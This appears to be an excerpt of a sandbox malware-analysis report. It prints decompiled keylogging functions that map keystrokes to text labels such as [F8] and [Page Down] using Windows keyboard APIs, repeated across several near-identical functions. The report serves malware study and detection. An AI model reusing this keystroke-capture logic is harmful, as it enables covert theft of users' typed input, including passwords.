				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85aaf
0x00c85ab6
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F10], xrefs: 00C85AB1

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85BAE, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85BAE(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F24]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85bae
0x00c85bb5
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[F24], xrefs: 00C85BB0
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85C14, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85C14(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F8]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85c14
0x00c85c1b
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[F8], xrefs: 00C85C16
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85DA0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85DA0(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Sleep]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85da0
0x00c85da7
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Sleep], xrefs: 00C85DA2
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85D02, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85D02(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Mode Change]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85d02
0x00c85d09
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Mode Change], xrefs: 00C85D04
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85D13, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85D13(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Page Down]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
